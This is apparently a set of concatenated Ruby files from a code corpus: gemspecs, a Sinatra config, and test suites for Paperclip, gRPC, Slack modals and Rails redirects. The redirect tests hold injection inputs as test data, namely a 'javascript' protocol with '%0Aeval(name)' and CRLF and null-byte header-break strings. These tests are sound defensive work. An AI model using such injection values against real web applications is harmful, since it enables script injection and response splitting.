s.add_dependency(%q<jemoji>.freeze, ["= 0.12.0"])
s.add_dependency(%q<jekyll-mentions>.freeze, ["= 1.6.0"])
s.add_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.2"])
s.add_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_dependency(%q<rubocop-github>.freeze, ["= 0.16.0"])
end
end
| 58.888889 | 112 | 0.660108 |
87f0487378f0ec576495df9c1972666a64fbeb60 | 611 | ENV['SINATRA_ENV'] ||= "development"
require 'bundler/setup'
Bundler.require(:default, ENV['SINATRA_ENV'])
ActiveRecord::Base.establish_connection(
:adapter => "sqlite3",
:database => "db/#{ENV['SINATRA_ENV']}.sqlite"
)
configure :production do
db = URI.parse(ENV['DATABASE_URL'] || 'postgres://localhost/mydb')
ActiveRecord::Base.establish_connection(
:adapter => db.scheme == 'postgres' ? 'postgresql' : db.scheme,
:host => db.host,
:username => db.user,
:password => db.password,
:database => db.path[1..-1],
:encoding => 'utf8'
)
end
require 'rack-flash'
require_all 'app'
| 23.5 | 67 | 0.664484 |
7a534c90410e79852d4afadb9580b872a8cd440c | 914 | Gem::Specification.new do |s|
s.name = "rack-mini-profiler"
s.version = "0.1.22"
s.summary = "Profiles loading speed for rack applications."
s.authors = ["Sam Saffron", "Robin Ward","Aleks Totic"]
s.description = "Profiling toolkit for Rack applications with Rails integration. Client Side profiling, DB profiling and Server profiling."
s.email = "[email protected]"
s.homepage = "http://miniprofiler.com"
s.files = [
'rack-mini-profiler.gemspec',
].concat( Dir.glob('Ruby/lib/**/*').reject {|f| File.directory?(f) || f =~ /~$/ } )
s.extra_rdoc_files = [
"Ruby/README.md",
"Ruby/CHANGELOG"
]
s.add_runtime_dependency 'rack', '>= 1.1.3'
if RUBY_VERSION < "1.9"
s.add_runtime_dependency 'json', '>= 1.6'
end
s.add_development_dependency 'rake'
s.add_development_dependency 'rack-test'
s.add_development_dependency 'activerecord', '~> 3.0'
s.require_paths = ["Ruby/lib"]
end
| 33.851852 | 140 | 0.68709 |
3393e5a61936cd3f0ef205012bbb7d8f556484ee | 770 | require 'bio-ucsc'
describe "Bio::Ucsc::Hg19::NtSssSnps" do
describe "#find_by_interval" do
context "given range chr1:1-100,000" do
it "returns an array of results" do
Bio::Ucsc::Hg19::DBConnection.default
Bio::Ucsc::Hg19::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-100,000")
r = Bio::Ucsc::Hg19::NtSssSnps.find_all_by_interval(i)
r.should have(5).items
end
it "returns an array of results with column accessors" do
Bio::Ucsc::Hg19::DBConnection.default
Bio::Ucsc::Hg19::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-100,000")
r = Bio::Ucsc::Hg19::NtSssSnps.find_by_interval(i)
r.chrom.should == "chr1"
end
end
end
end
| 30.8 | 63 | 0.637662 |
61ef52dc65d92a00c24be213da3c1e06267a4b91 | 13,566 | require 'test/helper.rb'
class IntegrationTest < Test::Unit::TestCase
context "Many models at once" do
setup do
rebuild_model
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
300.times do |i|
Dummy.create! :avatar => @file
end
end
should "not exceed the open file limit" do
assert_nothing_raised do
dummies = Dummy.find(:all)
dummies.each { |dummy| dummy.avatar }
end
end
end
context "An attachment" do
setup do
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"))
@dummy.avatar = @file
assert @dummy.save
end
should "create its thumbnails properly" do
assert_match /\b50x50\b/, `identify '#{@dummy.avatar.path(:thumb)}'`
end
context "redefining its attachment styles" do
setup do
Dummy.class_eval do
has_attached_file :avatar, :styles => { :thumb => "150x25#" }
end
@d2 = Dummy.find(@dummy.id)
@d2.avatar.reprocess!
@d2.save
end
should "create its thumbnails properly" do
assert_match /\b150x25\b/, `identify '#{@dummy.avatar.path(:thumb)}'`
end
end
end
context "A model with no attachment validation" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return false when asked about whiny_thumbnails" do
assert ! Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
context "when validates_attachment_thumbnails is called" do
setup do
Dummy.validates_attachment_thumbnails :avatar
end
should "have its definition return true when asked about whiny_thumbnails" do
assert_equal true, Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
end
context "redefined to have attachment validations" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:whiny_thumbnails => true,
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return true when asked about whiny_thumbnails" do
assert_equal true, Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
end
end
context "A model with no thumbnail_convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return nil when asked about convert_options" do
assert ! Dummy.attachment_definitions[:avatar][:thumbnail_convert_options]
end
context "redefined to have convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:thumbnail_convert_options => "-strip -depth 8",
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return convert_options value when asked about convert_options" do
assert_equal "-strip -depth 8", Dummy.attachment_definitions[:avatar][:thumbnail_convert_options]
end
end
end
context "A model with a filesystem attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:whiny_thumbnails => true,
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"))
assert @dummy.avatar = @file
assert @dummy.valid?
assert @dummy.save
end
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@dummy.avatar.to_file(style).path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s).path }
@d2 = Dummy.find(@dummy.id)
assert_equal "100x15", `identify -format "%wx%h" #{@d2.avatar.to_file.path}`.chomp
assert_equal "434x66", `identify -format "%wx%h" #{@d2.avatar.to_file(:original).path}`.chomp
assert_equal "300x46", `identify -format "%wx%h" #{@d2.avatar.to_file(:large).path}`.chomp
assert_equal "100x15", `identify -format "%wx%h" #{@d2.avatar.to_file(:medium).path}`.chomp
assert_equal "32x32", `identify -format "%wx%h" #{@d2.avatar.to_file(:thumb).path}`.chomp
@dummy.avatar = "not a valid file but not nil"
assert_equal File.basename(@file.path), @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert File.exists?(p)
end
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.to_file(style).path, @d2.avatar.to_file(style).path
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s).path }
@d2.avatar = nil
assert @d2.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
end
should "know the difference between good files, bad files, not files, and nil" do
expected = @dummy.avatar.to_file
@dummy.avatar = "not a file"
assert @dummy.valid?
assert_equal expected.path, @dummy.avatar.to_file.path
@dummy.avatar = @bad_file
assert ! @dummy.valid?
@dummy.avatar = nil
assert @dummy.valid?
end
should "know the difference between good files, bad files, not files, and nil when validating" do
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?
@d2.avatar = @bad_file
assert ! @d2.valid?
@d2.avatar = nil
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
context "that is assigned its file from another Paperclip attachment" do
setup do
@dummy2 = Dummy.new
@file2 = File.new(File.join(FIXTURES_DIR, "12k.png"))
assert @dummy2.avatar = @file2
@dummy2.save
end
should "work when assigned a file" do
assert_not_equal `identify -format "%wx%h" #{@dummy.avatar.to_file(:original).path}`,
`identify -format "%wx%h" #{@dummy2.avatar.to_file(:original).path}`
assert @dummy.avatar = @dummy2.avatar
@dummy.save
assert_equal `identify -format "%wx%h" #{@dummy.avatar.to_file(:original).path}`,
`identify -format "%wx%h" #{@dummy2.avatar.to_file(:original).path}`
end
should "work when assigned a nil file" do
@dummy2.avatar = nil
@dummy2.save
@dummy.avatar = @dummy2.avatar
@dummy.save
assert [email protected]?
end
end
end
if ENV['S3_TEST_BUCKET']
def s3_files_for attachment
[:thumb, :medium, :large, :original].inject({}) do |files, style|
data = `curl '#{attachment.url(style)}' 2>/dev/null`.chomp
t = Tempfile.new("paperclip-test")
t.write(data)
t.rewind
files[style] = t
files
end
end
context "A model with an S3 attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:storage => :s3,
:whiny_thumbnails => true,
# :s3_options => {:logger => Logger.new(StringIO.new)},
:s3_credentials => File.new(File.join(File.dirname(__FILE__), "s3.yml")),
:default_style => :medium,
:bucket => ENV['S3_TEST_BUCKET'],
:path => ":class/:attachment/:id/:style/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"))
assert @dummy.avatar = @file
assert @dummy.valid?
assert @dummy.save
@files_on_s3 = s3_files_for @dummy.avatar
end
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@files_on_s3[style].path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@d2 = Dummy.find(@dummy.id)
@d2_files = s3_files_for @d2.avatar
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@d2_files[style].path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@dummy.avatar = "not a valid file but not nil"
assert_equal File.basename(@file.path), @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
saved_keys.each do |key|
assert key.exists?
end
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_keys.each do |key|
assert ! key.exists?
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.to_file(style).to_s, @d2.avatar.to_file(style).to_s
end
saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
@d2.avatar = nil
assert @d2.save
saved_keys.each do |key|
assert ! key.exists?
end
end
should "know the difference between good files, bad files, not files, and nil" do
expected = @dummy.avatar.to_file
@dummy.avatar = "not a file"
assert @dummy.valid?
assert_equal expected.full_name, @dummy.avatar.to_file.full_name
@dummy.avatar = @bad_file
assert ! @dummy.valid?
@dummy.avatar = nil
assert @dummy.valid?
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?
@d2.avatar = @bad_file
assert ! @d2.valid?
@d2.avatar = nil
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
end
end
end
| 34.431472 | 105 | 0.567153 |
010c94cb91b8730668f83c0e54dd1978976e56bc | 1,374 | #!/usr/bin/env ruby
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
this_dir = File.expand_path(File.dirname(__FILE__))
grpc_lib_dir = File.join(File.dirname(this_dir), 'lib')
$LOAD_PATH.unshift(grpc_lib_dir) unless $LOAD_PATH.include?(grpc_lib_dir)
def main
fail('GRPC constant loaded before expected') if Object.const_defined?(:GRPC)
require 'grpc/core/status_codes'
fail('GRPC constant not loaded when expected') unless Object.const_defined?(:GRPC)
fail('GRPC Core not loaded after required') unless GRPC.const_defined?(:Core)
fail('GRPC StatusCodes not loaded after required') unless GRPC::Core.const_defined?(:StatusCodes)
fail('GRPC library loaded before required') if GRPC::Core.const_defined?(:Channel)
require 'grpc'
fail('GRPC library not loaded after required') unless GRPC::Core.const_defined?(:Channel)
end
main
| 41.636364 | 99 | 0.767103 |
79767a5ec00a93ed61727a50a2b85d1a5bd96b70 | 279 | class ChildrenInHomeForm < Form
set_attributes_for :navigator, :children_in_home
def save
interview.navigator.update(attributes_for(:navigator))
end
def self.existing_attributes(interview)
HashWithIndifferentAccess.new(interview.navigator.attributes)
end
end
| 23.25 | 65 | 0.802867 |
e99fcea68d05ea0ed7a6cb4e15562bfa1e36f259 | 1,241 | require "spec_helper"
describe Slack::ModalPublisher do
before do
allow(STDOUT).to receive(:puts)
end
describe "publish_profile_modal_404" do
let(:subject) {
VCR.use_cassette("slack/publish_profile_modal_404") do
described_class.publish_profile_modal_404("trigger")
end
}
it "should return true" do
expect(subject).to be true
end
end
describe "publish_profile_modal" do
let(:user) { create_user("42", slack_user_id: "U4SPRR1J8") }
let(:user_profile) do
{
'first_name' => user.first_name,
'last_name' => user.last_name,
'avatar' => "http://refuge.la-cordee.net/avatar.jpg",
'tags' => ['cuisine'],
'description' => 'lorem ipsum',
'description_1' => 'lorem ipsum',
'description_2' => 'lorem ipsum',
'description_3' => 'lorem ipsum',
'description_4' => 'lorem ipsum',
'home' => 'Nantes',
'created_at' => Time.now
}
end
let(:subject) {
VCR.use_cassette("slack/publish_profile_modal") do
described_class.publish_profile_modal(user, user_profile, "trigger")
end
}
it "should return true" do
expect(subject).to be true
end
end
end | 25.326531 | 76 | 0.614021 |
033a42a8176a824c00e54ee8b1c90f9031416c38 | 267 | class CreateProgramStudentAssignments < ActiveRecord::Migration[5.0]
def change
create_table :program_student_assignments do |t|
t.references :student, foreign_key: true
t.references :program, foreign_key: true
t.timestamps
end
end
end
| 24.272727 | 68 | 0.734082 |
e218ef35e483bd3ca69557d4ffd6e740d305cea1 | 12,723 | # frozen_string_literal: true
require "abstract_unit"
class Workshop
extend ActiveModel::Naming
include ActiveModel::Conversion
OUT_OF_SCOPE_BLOCK = proc do
raise "Not executed in controller's context" unless RedirectController === self
request.original_url
end
attr_accessor :id
def initialize(id)
@id = id
end
def persisted?
id.present?
end
def to_s
id.to_s
end
end
class RedirectController < ActionController::Base
# empty method not used anywhere to ensure methods like
# `status` and `location` aren't called on `redirect_to` calls
def status; raise "Should not be called!"; end
def location; raise "Should not be called!"; end
def simple_redirect
redirect_to action: "hello_world"
end
def redirect_with_status
redirect_to(action: "hello_world", status: 301)
end
def redirect_with_status_hash
redirect_to({ action: "hello_world" }, { status: 301 })
end
def redirect_with_protocol
redirect_to action: "hello_world", protocol: "https"
end
def url_redirect_with_status
redirect_to("http://www.example.com", status: :moved_permanently)
end
def url_redirect_with_status_hash
redirect_to("http://www.example.com", status: 301)
end
def relative_url_redirect_with_status
redirect_to("/things/stuff", status: :found)
end
def relative_url_redirect_with_status_hash
redirect_to("/things/stuff", status: 301)
end
def redirect_back_with_status
redirect_back(fallback_location: "/things/stuff", status: 307)
end
def redirect_back_with_status_and_fallback_location_to_another_host
redirect_back(fallback_location: "http://www.rubyonrails.org/", status: 307)
end
def safe_redirect_back_with_status
redirect_back(fallback_location: "/things/stuff", status: 307, allow_other_host: false)
end
def safe_redirect_back_with_status_and_fallback_location_to_another_host
redirect_back(fallback_location: "http://www.rubyonrails.org/", status: 307, allow_other_host: false)
end
def host_redirect
redirect_to action: "other_host", only_path: false, host: "other.test.host"
end
def module_redirect
redirect_to controller: "module_test/module_redirect", action: "hello_world"
end
def redirect_to_url
redirect_to "http://www.rubyonrails.org/"
end
def redirect_to_url_with_unescaped_query_string
redirect_to "http://example.com/query?status=new"
end
def redirect_to_url_with_complex_scheme
redirect_to "x-test+scheme.complex:redirect"
end
def redirect_to_url_with_network_path_reference
redirect_to "//www.rubyonrails.org/"
end
def redirect_to_existing_record
redirect_to Workshop.new(5)
end
def redirect_to_new_record
redirect_to Workshop.new(nil)
end
def redirect_to_nil
redirect_to nil
end
def redirect_to_polymorphic
redirect_to [:internal, Workshop.new(5)]
end
def redirect_to_polymorphic_string_args
redirect_to ["internal", Workshop.new(5)]
end
def redirect_to_params
redirect_to ActionController::Parameters.new(status: 200, protocol: "javascript", f: "%0Aeval(name)")
end
def redirect_to_with_block
redirect_to proc { "http://www.rubyonrails.org/" }
end
def redirect_to_with_block_and_assigns
@url = "http://www.rubyonrails.org/"
redirect_to proc { @url }
end
def redirect_to_with_block_and_options
redirect_to proc { { action: "hello_world" } }
end
def redirect_to_out_of_scope_block
redirect_to Workshop::OUT_OF_SCOPE_BLOCK
end
def redirect_with_header_break
redirect_to "/lol\r\nwat"
end
def redirect_with_null_bytes
redirect_to "\000/lol\r\nwat"
end
def rescue_errors(e) raise e end
private
def dashbord_url(id, message)
url_for action: "dashboard", params: { "id" => id, "message" => message }
end
end
class RedirectTest < ActionController::TestCase
tests RedirectController
def test_simple_redirect
get :simple_redirect
assert_response :redirect
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_header_break
get :redirect_with_header_break
assert_response :redirect
assert_equal "http://test.host/lolwat", redirect_to_url
end
def test_redirect_with_null_bytes
get :redirect_with_null_bytes
assert_response :redirect
assert_equal "http://test.host/lolwat", redirect_to_url
end
def test_redirect_with_no_status
get :simple_redirect
assert_response 302
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_status
get :redirect_with_status
assert_response 301
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_status_hash
get :redirect_with_status_hash
assert_response 301
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_protocol
get :redirect_with_protocol
assert_response 302
assert_equal "https://test.host/redirect/hello_world", redirect_to_url
end
def test_url_redirect_with_status
get :url_redirect_with_status
assert_response 301
assert_equal "http://www.example.com", redirect_to_url
end
def test_url_redirect_with_status_hash
get :url_redirect_with_status_hash
assert_response 301
assert_equal "http://www.example.com", redirect_to_url
end
def test_relative_url_redirect_with_status
get :relative_url_redirect_with_status
assert_response 302
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_relative_url_redirect_with_status_hash
get :relative_url_redirect_with_status_hash
assert_response 301
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_relative_url_redirect_host_with_port
request.host = "test.host:1234"
get :relative_url_redirect_with_status
assert_response 302
assert_equal "http://test.host:1234/things/stuff", redirect_to_url
end
def test_simple_redirect_using_options
get :host_redirect
assert_response :redirect
assert_redirected_to action: "other_host", only_path: false, host: "other.test.host"
end
def test_module_redirect
get :module_redirect
assert_response :redirect
assert_redirected_to "http://test.host/module_test/module_redirect/hello_world"
end
def test_module_redirect_using_options
get :module_redirect
assert_response :redirect
assert_redirected_to controller: "module_test/module_redirect", action: "hello_world"
end
def test_redirect_to_url
get :redirect_to_url
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_url_with_unescaped_query_string
get :redirect_to_url_with_unescaped_query_string
assert_response :redirect
assert_redirected_to "http://example.com/query?status=new"
end
def test_redirect_to_url_with_complex_scheme
get :redirect_to_url_with_complex_scheme
assert_response :redirect
assert_equal "x-test+scheme.complex:redirect", redirect_to_url
end
def test_redirect_to_url_with_network_path_reference
get :redirect_to_url_with_network_path_reference
assert_response :redirect
assert_equal "//www.rubyonrails.org/", redirect_to_url
end
def test_redirect_back
referer = "http://www.example.com/coming/from"
@request.env["HTTP_REFERER"] = referer
get :redirect_back_with_status
assert_response 307
assert_equal referer, redirect_to_url
end
def test_redirect_back_with_no_referer
get :redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_redirect_back_with_no_referer_redirects_to_another_host
get :redirect_back_with_status_and_fallback_location_to_another_host
assert_response 307
assert_equal "http://www.rubyonrails.org/", redirect_to_url
end
def test_safe_redirect_back_from_other_host
@request.env["HTTP_REFERER"] = "http://another.host/coming/from"
get :safe_redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_safe_redirect_back_from_the_same_host
referer = "http://test.host/coming/from"
@request.env["HTTP_REFERER"] = referer
get :safe_redirect_back_with_status
assert_response 307
assert_equal referer, redirect_to_url
end
def test_safe_redirect_back_with_no_referer
get :safe_redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_safe_redirect_back_with_no_referer_redirects_to_another_host
get :safe_redirect_back_with_status_and_fallback_location_to_another_host
assert_response 307
assert_equal "http://www.rubyonrails.org/", redirect_to_url
end
def test_redirect_to_record
with_routing do |set|
set.draw do
resources :workshops
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_existing_record
assert_equal "http://test.host/workshops/5", redirect_to_url
assert_redirected_to Workshop.new(5)
get :redirect_to_new_record
assert_equal "http://test.host/workshops", redirect_to_url
assert_redirected_to Workshop.new(nil)
end
end
def test_polymorphic_redirect
with_routing do |set|
set.draw do
namespace :internal do
resources :workshops
end
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_polymorphic
assert_equal "http://test.host/internal/workshops/5", redirect_to_url
assert_redirected_to [:internal, Workshop.new(5)]
end
end
def test_polymorphic_redirect_with_string_args
with_routing do |set|
set.draw do
namespace :internal do
resources :workshops
end
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
error = assert_raises(ArgumentError) do
get :redirect_to_polymorphic_string_args
end
assert_equal("Please use symbols for polymorphic route arguments.", error.message)
end
end
def test_redirect_to_nil
error = assert_raise(ActionController::ActionControllerError) do
get :redirect_to_nil
end
assert_equal "Cannot redirect to nil!", error.message
end
def test_redirect_to_params
error = assert_raise(ActionController::UnfilteredParameters) do
get :redirect_to_params
end
assert_equal "unable to convert unpermitted parameters to hash", error.message
end
def test_redirect_to_with_block
get :redirect_to_with_block
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_with_block_and_assigns
get :redirect_to_with_block_and_assigns
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_out_of_scope_block
get :redirect_to_out_of_scope_block
assert_response :redirect
assert_redirected_to "http://test.host/redirect/redirect_to_out_of_scope_block"
end
def test_redirect_to_with_block_and_accepted_options
with_routing do |set|
set.draw do
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_with_block_and_options
assert_response :redirect
assert_redirected_to "http://test.host/redirect/hello_world"
end
end
end
module ModuleTest
class ModuleRedirectController < ::RedirectController
def module_redirect
redirect_to controller: "/redirect", action: "hello_world"
end
end
class ModuleRedirectTest < ActionController::TestCase
tests ModuleRedirectController
def test_simple_redirect
get :simple_redirect
assert_response :redirect
assert_equal "http://test.host/module_test/module_redirect/hello_world", redirect_to_url
end
def test_simple_redirect_using_options
get :host_redirect
assert_response :redirect
assert_redirected_to action: "other_host", only_path: false, host: "other.test.host"
end
def test_module_redirect
get :module_redirect
assert_response :redirect
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_module_redirect_using_options
get :module_redirect
assert_response :redirect
assert_redirected_to controller: "/redirect", action: "hello_world"
end
end
end
| 26.672956 | 105 | 0.754303 |
7a8f1aa09609576a1deeb7ceb12212af414deefb | 2,334 | require 'singleton'
module Cohortly
class TagConfig
include Singleton
attr_accessor :_tags, :_groups, :lookup_table
def self.draw_tags(&block)
instance._tags = []
instance._groups = []
instance.lookup_table = {}
instance.instance_eval(&block)
instance.compile!
instance
end
def tag(tag_name, &block)
self._tags << Tag.new(tag_name, &block)
end
def tags(*args, &block)
args.each {|x| tag(x, &block) }
end
def groups(*args)
self._groups = *args.collect(&:to_s)
end
def compile!
self._tags.each do |tag|
tag._controllers.each do |cont|
lookup_table[cont._name] ||= {}
cont._acts.each do |a|
lookup_table[cont._name][a] ||= []
tag_names = lookup_table[cont._name][a] << tag._name
lookup_table[cont._name][a] = tag_names.uniq
end
end
end
end
def tags_for(controller, action = :_all)
res = []
if lookup_table[controller.to_sym]
res += lookup_table[controller.to_sym][action.to_sym] || []
res += lookup_table[controller.to_sym][:_all] || []
end
res.uniq.collect &:to_s
end
def self.tags_for(controller, action = :_all)
return [] if controller.nil?
instance.tags_for(controller, action)
end
def self.all_tags
if instance._tags
instance._tags.collect {|x| x._name.to_s }
else
[]
end
end
def self.all_groups
instance._groups.sort
end
class Tag
attr_accessor :_name, :_controllers
def initialize(tag_name, &block)
self._controllers ||= []
self._name = tag_name.to_sym
instance_eval(&block)
end
def controller(controller_name, &block)
_controllers << Controller.new(controller_name, &block)
end
def controllers(*args)
args.each { |name| controller(name) { actions :_all } }
end
end
class Controller
attr_accessor :_name, :_acts
def initialize(controller_name, &block)
self._acts ||= []
self._name = controller_name.to_sym
self.instance_eval(&block)
end
def actions(*act_names)
self._acts = act_names.collect &:to_sym
end
end
end
end
| 24.568421 | 67 | 0.589117 |
0115d34c2abe602685919eba045b91b9719fd120 | 239 | class Paper < ApplicationRecord
validates :title, :venue, presence: true
validates :year, presence: true, numericality: true
has_and_belongs_to_many :authors
scope :filter_by_year, -> (year) { where('year = ?', year) }
end
| 34.142857 | 64 | 0.702929 |
e9c7e743af9892f528d874dd97d748eedb884e92 | 1,006 | require "carb"
require "carb/service/version"
# Basic interface for service objects. Use rspec shared example
# "Carb::Service" to check if you adhere to the interface correctly. Provides
# currying functionalities
module Carb::Service
# Invokes the service
# @param args [Hash{Symbol => Object}] arguments used in the service
# @return [::Carb::Monads::Either, ::Carb::Monads::Maybe, ::Carb::Monads::Try,
# ::Carb::Monads::Monad] output of the service MUST be an Either monad
def call(**args)
raise NotImplementedError
end
# Pre-fill defaults values for arguments to be passed to {#call}
# @param args [Hash{Symbol => Object}] arguments used in the service
# @return [Curried] service which can be invoked and will fill missing
# args with those supplied when {#curry} was invoked
def curry(**args)
Curried.new(self, args)
end
module_function
def Lambda(callable)
Lambda.new(callable)
end
end
require "carb/service/curried"
require "carb/service/lambda"
| 30.484848 | 80 | 0.72167 |
